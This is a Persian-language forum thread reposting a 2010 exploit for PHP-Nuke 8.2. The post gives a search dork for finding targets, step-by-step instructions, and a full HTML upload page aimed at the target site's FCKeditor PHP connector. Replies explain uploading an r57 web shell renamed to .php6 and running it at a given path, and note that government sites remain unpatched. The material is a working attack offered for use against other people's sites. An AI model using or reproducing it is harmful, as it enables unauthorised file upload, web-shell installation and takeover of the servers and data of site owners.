PHPNUKE 8.2 8.2 Remote Upload File Exploit

[nImaarek]

کد HTML:

# Title : PHPNUKE 8.2 Remote Upload File Exploit 
# Author : Net.Edit0r  
# Location : Iran 
# Date: 2010-06-25 
# Software Link:http://phpnuke.org/modules.php?name=Downloads 
# Dork : "POWERED BY PHPNUKE.IR" 
# Category : Remote 
# Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com 
# Special Thanks To :NetQurd (For help in finding bugs) > Email :NetQurd@Live.CoM 


[~]######################################### InformatioN #############################################[~] 

[~] 1.Save code html format 

[~] 2.Search Target.com 

[~] 3.Edit and replace & Target 

[~] 4.Save Html Page 

[~] 5.Open Page Html (Edite Source) 

[~] 6.Set Format PHP 

[~] 7.Choose File & Upload 

[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....) 

[~] 9.Target.com/images/uploads/File/File Name 

[~]######################################### ExploiT #############################################[~] 

[~] 1. Exploit File : 

<!-- 
* FCKeditor - The text editor for Internet - http://www.Sun 
* Test page for the File Browser connectors. 
--> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<title>FCKeditor - By Net.Edit0r</title> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<script type="text/javascript"> 

// Automatically detect the correct document.domain (#1919). 
(function() 
{ 
var d = document.domain ; 

while ( true ) 
{ 
// Test if we can access a parent property. 
try 
{ 
var test = window.opener.document.domain ; 
break ; 
} 
catch( e ) {} 

// Remove a domain part: www.mytest.example.com => mytest.example.com => example.com ... 
d = d.replace( /.*?(?:\.|$)/, '' ) ; 

if ( d.length == 0 ) 
break ;     // It was not able to detect the domain. 

try 
{ 
document.domain = d ; 
} 
catch (e) 
{ 
break ; 
} 
} 
})() ; 

function BuildBaseUrl( command ) 
{ 
var sUrl = 
document.getElementById('cmbConnector').value + 
'?Command=' + command + 
'&Type=' + document.getElementById('cmbType').value + 
'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ; 

return sUrl ; 
} 

function SetFrameUrl( url ) 
{ 
document.getElementById('eRunningFrame').src = url ; 

document.getElementById('eUrl').innerHTML = url ; 
} 

function GetFolders() 
{ 
SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ; 
return false ; 
} 

function GetFoldersAndFiles() 
{ 
SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ; 
return false ; 
} 

function CreateFolder() 
{ 
var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ; 

if ( ! sFolder ) 
return false ; 

var sUrl = BuildBaseUrl( 'CreateFolder' ) ; 
sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ; 

SetFrameUrl( sUrl ) ; 
return false ; 
} 

function OnUploadCompleted( errorNumber, fileName ) 
{ 
switch ( errorNumber ) 
{ 
case 0 : 
alert( 'File uploaded with no errors' ) ; 
break ; 
case 201 : 
GetFoldersAndFiles() ; 
alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ; 
break ; 
case 202 : 
alert( 'Invalid file' ) ; 
break ; 
default : 
alert( 'Error on file upload. Error number: ' + errorNumber ) ; 
break ; 
} 
} 

this.frames.frmUpload = this ; 

function SetAction() 
{ 
var sUrl = BuildBaseUrl( 'FileUpload' ) ; 
document.getElementById('eUrl').innerHTML = sUrl ; 
document.getElementById('frmUpload').action = sUrl ; 
} 

</script> 
</head> 
<body> 
<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> 
<tr> 

<td> 
<table cellspacing="0" cellpadding="0" border="0"> 
<tr> 
<td> 
Connector:<br /> 
<select id="cmbConnector" name="cmbConnector"> 
<option value="asp/connector.asp" selected="selected">ASP</option> 
<option value="aspx/connector.aspx">ASP.Net</option> 

<option value="cfm/connector.cfm">ColdFusion</option> 
<option value="lasso/connector.lasso">Lasso</option> 
<option value="perl/connector.cgi">Perl</option> 
<option value="http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php">PHP</option> 
<option value="py/connector.py">Python</option> 
</select> 

</td> 
<td> 
&nbsp;&nbsp;&nbsp;</td> 
<td> 
Current Folder<br /> 
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td> 
<td> 
&nbsp;&nbsp;&nbsp;</td> 

<td> 
Resource Type<br /> 
<select id="cmbType" name="cmbType"> 
<option value="File" selected="selected">File</option> 
<option value="Image">Image</option> 
<option value="Flash">Flash</option> 
<option value="Media">Media</option> 

<option value="Invalid">Invalid Type (for testing)</option> 
</select> 
</td> 
</tr> 
</table> 
<br /> 
<table cellspacing="0" cellpadding="0" border="0"> 
<tr> 

<td valign="top"> 
<a href="#" onclick="GetFolders();">Get Folders</a></td> 
<td> 
&nbsp;&nbsp;&nbsp;</td> 
<td valign="top"> 
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td> 
<td> 
&nbsp;&nbsp;&nbsp;</td> 

<td valign="top"> 
<a href="#" onclick="CreateFolder();">Create Folder</a></td> 
<td> 
&nbsp;&nbsp;&nbsp;</td> 
<td valign="top"> 
<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> 
File Upload<br /> 
<input id="txtFileUpload" type="file" name="NewFile" /> 

<input type="submit" value="Upload" onclick="SetAction();" /> 
</form> 
</td> 
</tr> 
</table> 
<br /> 
URL: <span id="eUrl"></span> 
</td> 

</tr> 
<tr> 
<td height="100%" valign="top"> 
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" 
height="100%"></iframe> 
</td> 
</tr> 
</table> 
</body> 
</html> 

[~]######################################## ThankS To ... #########################################[~] 

[~] Special Thanks To My Best FriendS : 

NetQard , B3hz4d , Raiden ,D3v1l.BlackHat~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , Zend  

[~] IRANIAN Young HackerZ 

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR 

[~]######################################### FinisH :D #############################################[~]

کد:

http://inj3ct0r.com/exploits/12943

کد:

http://www.bugsearch.net/en/10227/phpnuck-82-remote-upload-file-exploit.html?ref=3

---

موضوعات مشابه:

• نرم افزاری برای مشاهده ی exploit های سیستم عامل
• isa server 2006 upload file
• VBulettin <=3.6.4 SQL Injection Exploit
• معرفي سايت براي اطلاع از آخرين Exploit ها (پروكسي و فايروال)
• مقاله ي عملكرد و برنامه نويسي Exploit ها

---

[zamoova]

سلام

اين باگ پچ شده.

[nImaarek]

نه حاجی پچ نشده
این باگ روی ورِن 8.2 جواب می ده (اغلب)

باید شل را پسوند به php6 به بالا (php7-php8-...) عوض کنید و اینکه یه جا خوندم r57 باشه بهتره جواب می ده و سپس تارگتی را که می خواهید هک کنید را در قسمتی که معرفی کردم بزارید :

Your-Target.com/includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

حالا شل خودتون رو آپلود کنید و از آدرس زیر اون رو اجرا کنید :

Your-Target.com/images/uploads/File/shell.php6

اگه سوالی دارید همینجا بپرسی

[Sinozit]

بله باگ پچ نشده ماله دو هفته پیشه حدوداً فکر کنم . باگ جالبیه .

[zamoova]

سلام

نه حاجی پچ نشده
این باگ روی ورِن 8.2 جواب می ده (اغلب)

باید شل را پسوند به php6 به بالا (php7-php8-...) عوض کنید و اینکه یه جا خوندم r57 باشه بهتره جواب می ده و سپس تارگتی را که می خواهید هک کنید را در قسمتی که معرفی کردم بزارید :

Your-Target.com/includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

حالا شل خودتون رو آپلود کنید و از آدرس زیر اون رو اجرا کنید :

Your-Target.com/images/uploads/File/shell.php6

اگه سوالی دارید همینجا بپرسی

لطفا قبل از جواب کمی تامل کنید .
بستگی به این داره که باگ رو کجا امتحان کنی ببینی پچ شده یا نه.
شما از 2هفته حرف میزنید ، مطمئن باشید که در بعضی سازمان های
دولتی ،باگ های 1 سال پیش هم جواب میده.منظورم جایی نبود که ویندوز
ویستا اولتیمیت با قابلیت اپدیت و یک DVD نرم افزار ویستا رو کلا میتونی 2
هزار تومان بخری. منظورم جای دیگه ای بود ، اونورااااا

[sahar_gol]

سلام
اين باگ فقط روي 8.2 جواب ميده ؟
نسخه هاي قديمي تر چي ؟
جواب نميده ؟
ممكنه براي نسخه هاي قديمي تر هم بزاري ؟
اگه يه اينك مرجع هم بزاري خيلي ممنون ميشم.

[nImaarek]

سلام
اين باگ فقط روي 8.2 جواب ميده ؟
نسخه هاي قديمي تر چي ؟
جواب نميده ؟
ممكنه براي نسخه هاي قديمي تر هم بزاري ؟
اگه يه اينك مرجع هم بزاري خيلي ممنون ميشم.

فقط 8.2

نمی دونم

ندارم

milw0rm.com
inj3ct0r.com